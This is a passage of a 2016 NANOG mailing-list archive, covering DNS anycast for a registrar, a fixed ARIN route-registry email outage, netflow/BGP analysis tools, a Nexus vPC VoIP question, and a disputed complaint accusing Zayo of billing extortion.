at puck.Nether.net (Jared Mauch) Date: Sat, 13 Aug 2016 08:05:11 -0400 Subject: DNS Services for a registrar In-Reply-To: References: Message-ID: <20160813120511.GA8026@puck.nether.net> On Fri, Aug 12, 2016 at 03:50:55PM +0300, DaKnOb wrote: > Someone registered the domain ?corp.gr? and now sells subdomains similar to .com.gr, .co.uk, etc. They use a ?clever? way to make sure they will have 100% uptime at virtually no cost: > heh. amusing. surprised they don't have esgob in there too. but seriously, look at the anycast on a shoestring presentation from nat morris. There are a lot of ways to skin this cat. I've been meaning to respin a variant of my service for a few years now, maybe it's time to do it. - jared -- Jared Mauch | pgp key available via finger from jared at puck.nether.net clue++; | http://puck.nether.net/~jared/ My statements are only mine. From ESundberg at nitelusa.com Sat Aug 13 18:42:36 2016 From: ESundberg at nitelusa.com (Erik Sundberg) Date: Sat, 13 Aug 2016 18:42:36 +0000 Subject: ARIN Route Registry Issue In-Reply-To: References: Message-ID: I am having some issues with ARIN Route Registry email not responding to emails that I am sending. I sent 3 emails on friday to rr at arin.net with no response. Wondering if any one is having the same issue or if anyone from ARIn can chime in. I have opened a ticket with ARIN but its the weekend. Erik Sundberg Sr. Network Engineer Nitel 1101 West Lake Street,6th Fl Chicago, IL 60607 Desk: 773-661-5532 Cell: 708-710-7419 NOC 24/7: 866-892-0915 Email: esundberg at nitelusa.com http://www.nitelusa.com ________________________________ CONFIDENTIALITY NOTICE: This e-mail transmission, and any documents, files or previous e-mail messages attached to it may contain confidential information that is legally privileged. If you are not the intended recipient, or a person responsible for delivering it to the intended recipient, you are hereby notified that any disclosure, copying, distribution or use of any of the information contained in or attached to this transmission is STRICTLY PROHIBITED. If you have received this transmission in error please notify the sender immediately by replying to this e-mail. You must destroy the original transmission and its attachments without reading or saving in any manner. Thank you. From frnkblk at iname.com Sat Aug 13 20:12:28 2016 From: frnkblk at iname.com (frnkblk at iname.com) Date: Sat, 13 Aug 2016 15:12:28 -0500 Subject: ARIN Route Registry Issue In-Reply-To: References: Message-ID: <000e01d1f59f$04a59260$0df0b720$@iname.com> They are moving offices. https://www.arin.net/announcements/2016/20160804.html Frank -----Original Message----- From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Erik Sundberg Sent: Saturday, August 13, 2016 1:43 PM To: nanog at nanog.org Subject: ARIN Route Registry Issue I am having some issues with ARIN Route Registry email not responding to emails that I am sending. I sent 3 emails on friday to rr at arin.net with no response. Wondering if any one is having the same issue or if anyone from ARIn can chime in. I have opened a ticket with ARIN but its the weekend. Erik Sundberg Sr. Network Engineer Nitel 1101 West Lake Street,6th Fl Chicago, IL 60607 Desk: 773-661-5532 Cell: 708-710-7419 NOC 24/7: 866-892-0915 Email: esundberg at nitelusa.com http://www.nitelusa.com ________________________________ CONFIDENTIALITY NOTICE: This e-mail transmission, and any documents, files or previous e-mail messages attached to it may contain confidential information that is legally privileged. If you are not the intended recipient, or a person responsible for delivering it to the intended recipient, you are hereby notified that any disclosure, copying, distribution or use of any of the information contained in or attached to this transmission is STRICTLY PROHIBITED. If you have received this transmission in error please notify the sender immediately by replying to this e-mail. You must destroy the original transmission and its attachments without reading or saving in any manner. Thank you. From randy at psg.com Sat Aug 13 22:30:22 2016 From: randy at psg.com (Randy Bush) Date: Sun, 14 Aug 2016 07:30:22 +0900 Subject: ARIN Route Registry Issue In-Reply-To: <000e01d1f59f$04a59260$0df0b720$@iname.com> References: <000e01d1f59f$04a59260$0df0b720$@iname.com> Message-ID: > They are moving offices. > https://www.arin.net/announcements/2016/20160804.html "All other customer support business systems (website, email, ARIN Online, RESTful Provisioning, Whois, RDAP, IRR, RPKI repository, etc.) will remain operational during the move." From sryan at arbor.net Sat Aug 13 22:33:11 2016 From: sryan at arbor.net (Ryan, Spencer) Date: Sat, 13 Aug 2016 22:33:11 +0000 Subject: ARIN Route Registry Issue In-Reply-To: References: <000e01d1f59f$04a59260$0df0b720$@iname.com>, Message-ID: <0c1wd450n6f068aev7b3h5ey.1471127590087@email.android.com> It says email will be online. Not that anyone will be there to answer them. Sent from my Verizon, Samsung Galaxy smartphone -------- Original message -------- From: Randy Bush Date: 8/13/16 6:30 PM (GMT-05:00) To: Frank Bulk Cc: North American Network Operators' Group Subject: Re: ARIN Route Registry Issue > They are moving offices. > https://www.arin.net/announcements/2016/20160804.html "All other customer support business systems (website, email, ARIN Online, RESTful Provisioning, Whois, RDAP, IRR, RPKI repository, etc.) will remain operational during the move." From randy at psg.com Sat Aug 13 22:40:21 2016 From: randy at psg.com (Randy Bush) Date: Sun, 14 Aug 2016 07:40:21 +0900 Subject: ARIN Route Registry Issue In-Reply-To: <0c1wd450n6f068aev7b3h5ey.1471127590087@email.android.com> References: <000e01d1f59f$04a59260$0df0b720$@iname.com> Message-ID: > It says email will be online. Not that anyone will be there to answer them. >> They are moving offices. >> https://www.arin.net/announcements/2016/20160804.html > > "All other customer support business systems (website, email, ARIN > Online, RESTful Provisioning, Whois, RDAP, IRR, RPKI repository, etc.) > will remain operational during the move." the op was reporting a problem with email-based irr updated randy From jcurran at arin.net Sat Aug 13 23:12:02 2016 From: jcurran at arin.net (John Curran) Date: Sat, 13 Aug 2016 23:12:02 +0000 Subject: ARIN Route Registry Issue In-Reply-To: References: Message-ID: <639C5CB3-A20C-4BBB-9ABA-B0BC866BB5FA@arin.net> On Aug 13, 2016, at 12:42 PM, Erik Sundberg wrote: > > I am having some issues with ARIN Route Registry email not responding to emails that I am sending. > > I sent 3 emails on friday to rr at arin.net with no response. > > Wondering if any one is having the same issue or if anyone from ARIn can chime in. I have opened a ticket with ARIN but its the weekend. Erik - Our apologies - apparently there was an error that had RR email going to our HQ email servers (which are no longer present) rather than via smtp relay in the public-facing colocation sites. This has been since fixed, and the email queues flushed - i.e. you should have your responses at this time. (If this is not the case, please let me know asap.) Thanks! (and again apologizes for the glitch) /John John Curran President and CEO ARIN From ESundberg at nitelusa.com Sat Aug 13 23:42:22 2016 From: ESundberg at nitelusa.com (Erik Sundberg) Date: Sat, 13 Aug 2016 23:42:22 +0000 Subject: ARIN Route Registry Issue In-Reply-To: <639C5CB3-A20C-4BBB-9ABA-B0BC866BB5FA@arin.net> References: , <639C5CB3-A20C-4BBB-9ABA-B0BC866BB5FA@arin.net> Message-ID: John, I started to receive emails back from rr at arin.net. Thanks for looking at this. Good luck with the move. Erik Sundberg Sr. Network Engineer Nitel 1101 West Lake Street,6th Fl Chicago, IL 60607 Desk: 773-661-5532 Cell: 708-710-7419 NOC 24/7: 866-892-0915 Email: esundberg at nitelusa.com http://www.nitelusa.com > On Aug 13, 2016, at 7:13 PM, John Curran wrote: > >> On Aug 13, 2016, at 12:42 PM, Erik Sundberg wrote: >> >> I am having some issues with ARIN Route Registry email not responding to emails that I am sending. >> >> I sent 3 emails on friday to rr at arin.net with no response. >> >> Wondering if any one is having the same issue or if anyone from ARIn can chime in. I have opened a ticket with ARIN but its the weekend. > > > Erik - > > Our apologies - apparently there was an error that had RR email going to > our HQ email servers (which are no longer present) rather than via smtp > relay in the public-facing colocation sites. This has been since fixed, and > the email queues flushed - i.e. you should have your responses at this time. > (If this is not the case, please let me know asap.) > > Thanks! (and again apologizes for the glitch) > /John > > John Curran > President and CEO > ARIN > ________________________________ CONFIDENTIALITY NOTICE: This e-mail transmission, and any documents, files or previous e-mail messages attached to it may contain confidential information that is legally privileged. If you are not the intended recipient, or a person responsible for delivering it to the intended recipient, you are hereby notified that any disclosure, copying, distribution or use of any of the information contained in or attached to this transmission is STRICTLY PROHIBITED. If you have received this transmission in error please notify the sender immediately by replying to this e-mail. You must destroy the original transmission and its attachments without reading or saving in any manner. Thank you. From ESundberg at nitelusa.com Sun Aug 14 04:00:20 2016 From: ESundberg at nitelusa.com (Erik Sundberg) Date: Sun, 14 Aug 2016 04:00:20 +0000 Subject: ARIN Route Registry Issue In-Reply-To: <639C5CB3-A20C-4BBB-9ABA-B0BC866BB5FA@arin.net> References: <639C5CB3-A20C-4BBB-9ABA-B0BC866BB5FA@arin.net> Message-ID: <495D0934DA46854A9CA758393724D590455C5487@NI-MAIL02.nii.ads> Verified it's backup and working again with immediate responses. Erik Sundberg Sr. Network Engineer p: 773.661.5532 c: 708.274.7419 NOC: 866.892.0915 1101 W. Lake Street, 6th Floor | Chicago, IL 60607 esundberg at nitelusa.com | www.nitelusa.com Managed Telecom Services MPLS | Ethernet | Private Line | Internet | Voice -----Original Message----- From: John Curran [mailto:jcurran at arin.net] Sent: Saturday, August 13, 2016 6:12 PM To: Erik Sundberg Cc: nanog at nanog.org Subject: Re: ARIN Route Registry Issue On Aug 13, 2016, at 12:42 PM, Erik Sundberg wrote: > > I am having some issues with ARIN Route Registry email not responding to emails that I am sending. > > I sent 3 emails on friday to rr at arin.net with no response. > > Wondering if any one is having the same issue or if anyone from ARIn can chime in. I have opened a ticket with ARIN but its the weekend. Erik - Our apologies - apparently there was an error that had RR email going to our HQ email servers (which are no longer present) rather than via smtp relay in the public-facing colocation sites. This has been since fixed, and the email queues flushed - i.e. you should have your responses at this time. (If this is not the case, please let me know asap.) Thanks! (and again apologizes for the glitch) /John John Curran President and CEO ARIN ________________________________ CONFIDENTIALITY NOTICE: This e-mail transmission, and any documents, files or previous e-mail messages attached to it may contain confidential information that is legally privileged. If you are not the intended recipient, or a person responsible for delivering it to the intended recipient, you are hereby notified that any disclosure, copying, distribution or use of any of the information contained in or attached to this transmission is STRICTLY PROHIBITED. If you have received this transmission in error please notify the sender immediately by replying to this e-mail. You must destroy the original transmission and its attachments without reading or saving in any manner. Thank you. From randy at psg.com Mon Aug 15 08:40:40 2016 From: randy at psg.com (Randy Bush) Date: Mon, 15 Aug 2016 10:40:40 +0200 Subject: netflow + as path = buildout decision Message-ID: my poor memory says that, some years back, someone announced or mentioned an open tool which i, a small isp, could feed my netflow data and bgp and ask if i should peer with X or build out or ... anyone with a more precise memory than i? randy From chip.gwyn at gmail.com Mon Aug 15 09:01:29 2016 From: chip.gwyn at gmail.com (chip) Date: Mon, 15 Aug 2016 05:01:29 -0400 Subject: netflow + as path = buildout decision In-Reply-To: References: Message-ID: likely pmacct. http://www.pmacct.net It works quite well to augment or replace ASPath data from the router. --chip On Monday, August 15, 2016, Randy Bush wrote: > my poor memory says that, some years back, someone announced or > mentioned an open tool which i, a small isp, could feed my netflow data > and bgp and ask if i should peer with X or build out or ... > > anyone with a more precise memory than i? > > randy > -- Just my $.02, your mileage may vary, batteries not included, etc.... From job at instituut.net Mon Aug 15 09:07:40 2016 From: job at instituut.net (Job Snijders) Date: Mon, 15 Aug 2016 11:07:40 +0200 Subject: netflow + as path = buildout decision In-Reply-To: References: Message-ID: <20160815090740.GA1268@vurt.meerval.net> On Mon, Aug 15, 2016 at 10:40:40AM +0200, Randy Bush wrote: > my poor memory says that, some years back, someone announced or > mentioned an open tool which i, a small isp, could feed my netflow data > and bgp and ask if i should peer with X or build out or ... > > anyone with a more precise memory than i? Maybe one of these: o Powertool without frontend: http://pmacct.net/ o Comes with more eye-candy https://github.com/manuelkasper/AS-Stats Kind regards, Job From ask at develooper.com Sat Aug 13 08:13:26 2016 From: ask at develooper.com (=?utf-8?Q?Ask_Bj=C3=B8rn_Hansen?=) Date: Sat, 13 Aug 2016 01:13:26 -0700 Subject: DNS Services for a registrar In-Reply-To: References: Message-ID: <50E37DE8-E8F5-47D0-B28D-E6A91B65DB0D@develooper.com> > On Aug 11, 2016, at 22:56, Ryan Finnesey wrote: > > We need to provide DNS services for domains we offer as a registrar. > We were discussing internally the different options for the deployment. Does anyone see a down side to using IaaS on AWS and Azure? No anycast. > We were also kicking around the idea of a PaaS offering and using Azure DNS or AWS Route 53. https://www.pch.net/services/dns_anycast Ask From honorethics at yahoo.com Sat Aug 13 16:50:46 2016 From: honorethics at yahoo.com (HonorFirst Name Ethics) Date: Sat, 13 Aug 2016 16:50:46 +0000 (UTC) Subject: Zayo Extortion References: <1000746.4425928.1471107046018.JavaMail.yahoo.ref@mail.yahoo.com> Message-ID: <1000746.4425928.1471107046018.JavaMail.yahoo@mail.yahoo.com> Question to the NANOG community,? Is anyone else being extorted by Zayo? Is Zayo threatening shutdown over bogus and fabricated charges? The purpose of this message to the group is twofold: 1) to share our experience being extorted by Zayo with the community and 2) to understand the depth and extent of Zayo's less than ethical behavior by getting feedback from the community. Abovenet was a great organization with quality service, reasonable prices and nice folks to work with.? Since being acquired by Zayo we have seen a significant degradation of service quality and responsiveness which is not unusual from a provider, but Zayo has taken things to a level of low ethics that would make Tony Soprano proud. Most interestingly they seem to identify points where you are dependent on them and threaten a shut down unless you pay them some arbitrary amount.? In our case we use multiple Zayo IP, Transport, and Colo Services -- they set their extortion amount at $128,000.? A completely arbitrary and fabricated number.? They put significant pressure threatening to shut us down by setting their lawyers on us. Our detailed contract breakdowns, invoice and payment spreadsheets, along with all other commonsense and professional efforts were simply disregarded.? At one point their lawyers and accounting people had the nerve to say "our accounting system does not track invoice details -- it only shows the total amount due so your numbers mean nothing to us."? All the while they relentlessly levied disconnect threats with short timelines such as: "if you don't pay us $128,000 by this Friday, we will shut your operation down." We have had anecdotal feedback that we are not alone in our experience and that there are many more like us.? If you and your company have had a similar experience with Zayo, please share it with the group or if like us you are concerned about retaliation from Zayo, please respond privately.? If the group shares their experiences? the public shaming may drive Zayo to stop operating like mafia thugs.? If the problem is as common as we suspect, it may warrant getting the Attorney General involved. In the mean time, I strongly urge anyone already in a relationship with Zayo or considering a relationship to make sure your are well diversified with other more ethical carriers. Otherwise please consider another organization to work with. In our case we were better of with Ransomeware, than Zayo as a vendor!? Its cheaper and less damaging A Zayo victim and a NANOG Member From ndavis at arin.net Sat Aug 13 19:50:14 2016 From: ndavis at arin.net (Nate Davis) Date: Sat, 13 Aug 2016 19:50:14 +0000 Subject: ARIN Route Registry Issue In-Reply-To: References: Message-ID: Erik - I?ve reach out to you off-list. Regards, Nate Davis Chief Operating Officer American Registry for Internet Numbers On 8/13/16, 2:42 PM, "NANOG on behalf of Erik Sundberg" wrote: >I am having some issues with ARIN Route Registry email not responding to >emails that I am sending. > >I sent 3 emails on friday to rr at arin.net with no >response. > >Wondering if any one is having the same issue or if anyone from ARIn can >chime in. I have opened a ticket with ARIN but its the weekend. > > >Erik Sundberg >Sr. Network Engineer >Nitel >1101 West Lake Street,6th Fl >Chicago, IL 60607 >Desk: 773-661-5532 >Cell: 708-710-7419 >NOC 24/7: 866-892-0915 >Email: esundberg at nitelusa.com >http://www.nitelusa.com > > >________________________________ > >CONFIDENTIALITY NOTICE: This e-mail transmission, and any documents, >files or previous e-mail messages attached to it may contain confidential >information that is legally privileged. If you are not the intended >recipient, or a person responsible for delivering it to the intended >recipient, you are hereby notified that any disclosure, copying, >distribution or use of any of the information contained in or attached to >this transmission is STRICTLY PROHIBITED. If you have received this >transmission in error please notify the sender immediately by replying to >this e-mail. You must destroy the original transmission and its >attachments without reading or saving in any manner. Thank you. From sathish.kumar.ippani at gmail.com Sun Aug 14 21:59:07 2016 From: sathish.kumar.ippani at gmail.com (sathish kumar Ippani) Date: Mon, 15 Aug 2016 03:29:07 +0530 Subject: Cisco Nexus vPC-VOIP Issues Message-ID: Hello All, Thank you all in advance. We have connected two nexus 3048 Switches and two l2 Switches as below using vPC and LACP. We have not seen any issues apart from one of VOIP server connected to Switch 1 has lost access to VOIP Server connected Switch 2 and vice versa. Where I am able to ping both from Global. Can you please let me know what is went wrong here. [image: Inline image 2] -- With Regards, Sathish Kumar Ippani 9177166040 From remy at true.nl Mon Aug 15 08:50:09 2016 From: remy at true.nl (Remy de Boer / True) Date: Mon, 15 Aug 2016 08:50:09 +0000 Subject: netflow + as path = buildout decision In-Reply-To: References: Message-ID: <3E6C7FD3-02D9-49C5-8248-520BFB9BE2A8@true.nl> This one doesn?t peer with your BGP, but sounds pretty close for the rest: https://github.com/manuelkasper/AS-Stats > On 15 Aug 2016, at 10:40, Randy Bush wrote: > > my poor memory says that, some years back, someone announced or > mentioned an open tool which i, a small isp, could feed my netflow data > and bgp and ask if i should peer with X or build out or ... > > anyone with a more precise memory than i? > > randy -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 496 bytes Desc: Message signed with OpenPGP using GPGMail URL: From nanog at lodpp.net Mon Aug 15 10:23:37 2016 From: nanog at lodpp.net (nico nanog) Date: Mon, 15 Aug 2016 12:23:37 +0200 Subject: Cisco Nexus vPC-VOIP Issues In-Reply-To: References: Message-ID: <39495a84-08b6-5b77-5c5b-d15f5a77b565@lodpp.net> Hello, I cannot see any image in attachment. If you can ping from outside and not between them, wild guess it's not a L2 pbm. Are you able to see the arp of srv2 from srv1 ( and vice-versa ) Without more info ( or it's maybe on the image I cannot see ) I would look in ACL somewhere/firewall on srv Rgd, Nico On 08/14/2016 11:59 PM, sathish kumar Ippani wrote: > Hello All, > > Thank you all in advance. > > We have connected two nexus 3048 Switches and two l2 Switches as below > using vPC and LACP. > > We have not seen any issues apart from one of VOIP server connected to > Switch 1 has lost access to VOIP Server connected Switch 2 and vice versa. > > Where I am able to ping both from Global. Can you please let me know what > is went wrong here. > > > [image: Inline image 2] > -- Try and fail but never fail to try From nanog at ics-il.net Mon Aug 15 12:29:19 2016 From: nanog at ics-il.net (Mike Hammett) Date: Mon, 15 Aug 2016 07:29:19 -0500 (CDT) Subject: Zayo Extortion In-Reply-To: <1000746.4425928.1471107046018.JavaMail.yahoo@mail.yahoo.com> References: <1000746.4425928.1471107046018.JavaMail.yahoo.ref@mail.yahoo.com> <1000746.4425928.1471107046018.JavaMail.yahoo@mail.yahoo.com> Message-ID: <1161972786.328.1471264156770.JavaMail.mhammett@ThunderFuck> Try more facts and less emotion. ----- Mike Hammett Intelligent Computing Solutions Midwest Internet Exchange The Brothers WISP ----- Original Message ----- From: "HonorFirst Name Ethics via NANOG" To: nanog at nanog.org Sent: Saturday, August 13, 2016 11:50:46 AM Subject: Zayo Extortion Question to the NANOG community, Is anyone else being extorted by Zayo? Is Zayo threatening shutdown over bogus and fabricated charges? The purpose of this message to the group is twofold: 1) to share our experience being extorted by Zayo with the community and 2) to understand the depth and extent of Zayo's less than ethical behavior by getting feedback from the community. Abovenet was a great organization with quality service, reasonable prices and nice folks to work with. Since being acquired by Zayo we have seen a significant degradation of service quality and responsiveness which is not unusual from a provider, but Zayo has taken things to a level of low ethics that would make Tony Soprano proud. Most interestingly they seem to identify points where you are dependent on them and threaten a shut down unless you pay them some arbitrary amount. In our case we use multiple Zayo IP, Transport, and Colo Services -- they set their extortion amount at $128,000. A completely arbitrary and fabricated number. They put significant pressure threatening to shut us down by setting their lawyers on us. Our detailed contract breakdowns, invoice and payment spreadsheets, along with all other commonsense and professional efforts were simply disregarded. At one point their lawyers and accounting people had the nerve to say "our accounting system does not track invoice details -- it only shows the total amount due so your numbers mean nothing to us." All the while they relentlessly levied disconnect threats with short timelines such as: "if you don't pay us $128,000 by this Friday, we will shut your operation down." We have had anecdotal feedback that we are not alone in our experience and that there are many more like us. If you and your company have had a similar experience with Zayo, please share it with the group or if like us you are concerned about retaliation from Zayo, please respond privately. If the group shares their experiences the public shaming may drive Zayo to stop operating like mafia thugs. If the problem is as common as we suspect, it may warrant getting the Attorney General involved. In the mean time, I strongly urge anyone already in a relationship with Zayo or considering a relationship to make sure your are well diversified with other more ethical carriers. Otherwise please consider another organization to work with. In our case we were better of with Ransomeware, than Zayo as a vendor! Its cheaper and less damaging A Zayo victim and a NANOG Member From paras at protrafsolutions.com Mon Aug 15 14:13:46 2016 From: paras at protrafsolutions.com (Paras Jha) Date: Mon, 15 Aug 2016 10:13:46 -0400 Subject: Zayo Extortion In-Reply-To: <1161972786.328.1471264156770.JavaMail.mhammett@ThunderFuck> References: <1000746.4425928.1471107046018.JavaMail.yahoo.ref@mail.yahoo.com> <1000746.4425928.1471107046018.JavaMail.yahoo@mail.yahoo.com> <1161972786.328.1471264156770.JavaMail.mhammett@ThunderFuck> Message-ID: Yeah, I see a wall of text, but no real evidence to substantiate it. On Mon, Aug 15, 2016 at 8:29 AM, Mike Hammett wrote: > Try more facts and less emotion. > > > > ----- > Mike Hammett > Intelligent Computing Solutions > > Midwest Internet Exchange > > The Brothers WISP > > > ----- Original Message ----- > > From: "HonorFirst Name Ethics via NANOG" > To: nanog at nanog.org > Sent: Saturday, August 13, 2016 11:50:46 AM > Subject: Zayo Extortion > > Question to the NANOG community, Is anyone else being extorted by Zayo? Is > Zayo threatening shutdown over bogus and fabricated charges? > > The purpose of this message to the group is twofold: 1) to share our > experience being extorted by Zayo with the community and 2) to understand > the depth and extent of Zayo's less than ethical behavior by getting > feedback from the community. > > Abovenet was a great organization with quality service, reasonable prices > and nice folks to work with. Since being acquired by Zayo we have seen a > significant degradation of service quality and responsiveness which is not > unusual from a provider, but Zayo has taken things to a level of low ethics > that would make Tony Soprano proud. > Most interestingly they seem to identify points where you are dependent on > them and threaten a shut down unless you pay them some arbitrary amount. In > our case we use multiple Zayo IP, Transport, and Colo Services -- they set > their extortion amount at $128,000. A completely arbitrary and fabricated > number. They put significant pressure threatening to shut us down by > setting their lawyers on us. > Our detailed contract breakdowns, invoice and payment spreadsheets, along > with all other commonsense and professional efforts were simply > disregarded. At one point their lawyers and accounting people had the nerve > to say "our accounting system does not track invoice details -- it only > shows the total amount due so your numbers mean nothing to us." All the > while they relentlessly levied disconnect threats with short timelines such > as: "if you don't pay us $128,000 by this Friday, we will shut your > operation down." > We have had anecdotal feedback that we are not alone in our experience and > that there are many more like us. If you and your company have had a > similar experience with Zayo, please share it with the group or if like us > you are concerned about retaliation from Zayo, please respond privately. > > If the group shares their experiences the public shaming may drive Zayo to > stop operating like mafia thugs. If the problem is as common as we suspect, > it may warrant getting the Attorney General involved. > > In the mean time, I strongly urge anyone already in a relationship with > Zayo or considering a relationship to make sure your are well diversified > with other more ethical carriers. Otherwise please consider another > organization to work with. > In our case we were better of with Ransomeware, than Zayo as a vendor! Its > cheaper and less damaging > > A Zayo victim and a NANOG Member > -- Regards, Paras President ProTraf Solutions, LLC Enterprise DDoS Mitigation From cb.list6 at gmail.com Mon Aug 15 15:10:22 2016 From: cb.list6 at gmail.com (Ca By) Date: Mon, 15 Aug 2016 08:10:22 -0700 Subject: Zayo Extortion In-Reply-To: <1000746.4425928.1471107046018.JavaMail.yahoo@mail.yahoo.com> References: <1000746.4425928.1471107046018.JavaMail.yahoo.ref@mail.yahoo.com> <1000746.4425928.1471107046018.JavaMail.yahoo@mail.yahoo.com> Message-ID: Nope, have not seen any of this bad stuff you speak of. I can say that over the last few years i have done a ton business with Zayo and they are top flight in every respect. On Saturday, August 13, 2016, HonorFirst Name Ethics via NANOG < nanog at nanog.org> wrote: > Question to the NANOG community, Is anyone else being extorted by Zayo? > Is Zayo threatening shutdown over bogus and fabricated charges? > > The purpose of this message to the group is twofold: 1) to share our > experience being extorted by Zayo with the community and 2) to understand > the depth and extent of Zayo's less than ethical behavior by getting > feedback from the community. > > Abovenet was a great organization with quality service, reasonable prices > and nice folks to work with. Since being acquired by Zayo we have seen a > significant degradation of service quality and responsiveness which is not > unusual from a provider, but Zayo has taken things to a level of low ethics > that would make Tony Soprano proud. > Most interestingly they seem to identify points where you are dependent on > them and threaten a shut down unless you pay them some arbitrary amount. > In our case we use multiple Zayo IP, Transport, and Colo Services -- they > set their extortion amount at $128,000. A completely arbitrary and > fabricated number. They put significant pressure threatening to shut us > down by setting their lawyers on us. > Our detailed contract breakdowns, invoice and payment spreadsheets, along > with all other commonsense and professional efforts were simply > disregarded. At one point their lawyers and accounting people had the > nerve to say "our accounting system does not track invoice details -- it > only shows the total amount due so your numbers mean nothing to us." All > the while they relentlessly levied disconnect threats with short timelines > such as: "if you don't pay us $128,000 by this Friday, we will shut your > operation down." > We have had anecdotal feedback that we are not alone in our experience and > that there are many more like us. If you and your company have had a > similar experience with Zayo, please share it with the group or if like us > you are concerned about retaliation from Zayo, please respond privately. > > If the group shares their experiences the public shaming may drive Zayo > to stop operating like mafia thugs. If the problem is as common as we > suspect, it may warrant getting the Attorney General involved. > > In the mean time, I strongly urge anyone already in a relationship with > Zayo or considering a relationship to make sure your are well diversified > with other more ethical carriers. Otherwise please consider another > organization to work with. > In our case we were better of with Ransomeware, than Zayo as a vendor! > Its cheaper and less damaging > > A Zayo victim and a NANOG Member > From jlewis at lewis.org Mon Aug 15 15:16:26 2016 From: jlewis at lewis.org (Jon Lewis) Date: Mon, 15 Aug 2016 11:16:26 -0400 (EDT) Subject: Zayo Extortion In-Reply-To: References: <1000746.4425928.1471107046018.JavaMail.yahoo.ref@mail.yahoo.com> <1000746.4425928.1471107046018.JavaMail.yahoo@mail.yahoo.com> Message-ID: Obvious first question would be, have you fallen behind paying your bill? Most service providers will threaten to disrupt your service if you don't pay for the services they provide. I would expect you're months behind paying for service before they say: "if you don't pay us $128,000 by this Friday, we will shut [you down]." > On Saturday, August 13, 2016, HonorFirst Name Ethics via NANOG < > nanog at nanog.org> wrote: > >> Question to the NANOG community, Is anyone else being extorted by Zayo? >> Is Zayo threatening shutdown over bogus and fabricated charges? >> >> The purpose of this message to the group is twofold: 1) to share our >> experience being extorted by Zayo with the community and 2) to understand >> the depth and extent of Zayo's less than ethical behavior by getting >> feedback from the community. >> >> Abovenet was a great organization with quality service, reasonable prices >> and nice folks to work with. Since being acquired by Zayo we have seen a >> significant degradation of service quality and responsiveness which is not >> unusual from a provider, but Zayo has taken things to a level of low ethics >> that would make Tony Soprano proud. >> Most interestingly they seem to identify points where you are dependent on >> them and threaten a shut down unless you pay them some arbitrary amount. >> In our case we use multiple Zayo IP, Transport, and Colo Services -- they >> set their extortion amount at $128,000. A completely arbitrary and >> fabricated number. They put significant pressure threatening to shut us >> down by setting their lawyers on us. >> Our detailed contract breakdowns, invoice and payment spreadsheets, along >> with all other commonsense and professional efforts were simply >> disregarded. At one point their lawyers and accounting people had the >> nerve to say "our accounting system does not track invoice details -- it >> only shows the total amount due so your numbers mean nothing to us." All >> the while they relentlessly levied disconnect threats with short timelines >> such as: "if you don't pay us $128,000 by this Friday, we will shut your >> operation down." >> We have had anecdotal feedback that we are not alone in our experience and >> that there are many more like us. If you and your company have had a >> similar experience with Zayo, please share it with the group or if like us >> you are concerned about retaliation from Zayo, please respond privately. >> >> If the group shares their experiences the public shaming may drive Zayo >> to stop operating like mafia thugs. If the problem is as common as we >> suspect, it may warrant getting the Attorney General involved. >> >> In the mean time, I strongly urge anyone already in a relationship with >> Zayo or considering a relationship to make sure your are well diversified >> with other more ethical carriers. Otherwise please consider another >> organization to work with. >> In our case we were better of with Ransomeware, than Zayo as a vendor! >> Its cheaper and less damaging >> >> A Zayo victim and a NANOG Member >> > ---------------------------------------------------------------------- Jon Lewis, MCP :) | I route | therefore you are _________ http://www.lewis.org/~jlewis/pgp for PGP public key_________ From Valdis.Kletnieks at vt.edu Mon Aug 15 15:41:28 2016 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Mon, 15 Aug 2016 11:41:28 -0400 Subject: Zayo Extortion In-Reply-To: References: <1000746.4425928.1471107046018.JavaMail.yahoo.ref@mail.yahoo.com> <1000746.4425928.1471107046018.JavaMail.yahoo@mail.yahoo.com> Message-ID: <13841.1471275688@turing-police.cc.vt.edu> On Mon, 15 Aug 2016 11:16:26 -0400, Jon Lewis said: > Obvious first question would be, have you fallen behind paying your bill? And if you're in fact up-to-date, make sure you have *proof* of same. It's not unheard of for providers to mis-credit your payments and then think you're behind. Usually showing them proof that funds were transferred to the provider, and it's *their* problem to fix their accounting system, is sufficient to make them change their tune *really* fast... -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 848 bytes Desc: not available URL: From savage at savage.za.org Mon Aug 15 15:49:06 2016 From: savage at savage.za.org (Chris Knipe) Date: Mon, 15 Aug 2016 17:49:06 +0200 Subject: Zayo Extortion In-Reply-To: <13841.1471275688@turing-police.cc.vt.edu> References: <1000746.4425928.1471107046018.JavaMail.yahoo.ref@mail.yahoo.com> <1000746.4425928.1471107046018.JavaMail.yahoo@mail.yahoo.com> <13841.1471275688@turing-police.cc.vt.edu> Message-ID: On Mon, Aug 15, 2016 at 5:41 PM, wrote: > On Mon, 15 Aug 2016 11:16:26 -0400, Jon Lewis said: > > Obvious first question would be, have you fallen behind paying your bill? > > And if you're in fact up-to-date, make sure you have *proof* of same. It's > not unheard of for providers to mis-credit your payments and then think > you're > behind. Usually showing them proof that funds were transferred to the > provider, and it's *their* problem to fix their accounting system, is > sufficient to make them change their tune *really* fast... > Although a company that can't manage their book keeping properly, is IMHO enough reason to not use them... :-) -- Regards, Chris Knipe From mysidia at gmail.com Mon Aug 15 18:00:06 2016 From: mysidia at gmail.com (Jimmy Hess) Date: Mon, 15 Aug 2016 13:00:06 -0500 Subject: Zayo Extortion In-Reply-To: <1000746.4425928.1471107046018.JavaMail.yahoo@mail.yahoo.com> References: <1000746.4425928.1471107046018.JavaMail.yahoo.ref@mail.yahoo.com> <1000746.4425928.1471107046018.JavaMail.yahoo@mail.yahoo.com> Message-ID: On Sat, Aug 13, 2016 at 11:50 AM, HonorFirst Name Ethics via NANOG wrote: > to say "our accounting system does not track invoice details -- it only shows the total amount due so your numbers mean nothing to us." > All the while they relentlessly levied disconnect threats with short timelines such as: "if you don't pay us $128,000 by this Friday, > we will shut your operation down." [...] >At one point their lawyers and accounting people had the nerve to say "our accounting system does not track invoice details Are you talking with your SP's lawyers without your a legal team of your own present and advising you? I think one of the first things they should tell you is not to discuss pending disputes in public. Time to get a consultation with your own Lawyers to assist with billing dispute resolution, ASAP. Provided there is a reasonable agreement in place: I think You ought to be able to at least temporarily delay your SP from turning off services, while you work out your billing dispute. The service provider could be subject to liability by turning off services which you have not agreed to disconnect. Your lawyers should be able to refute a 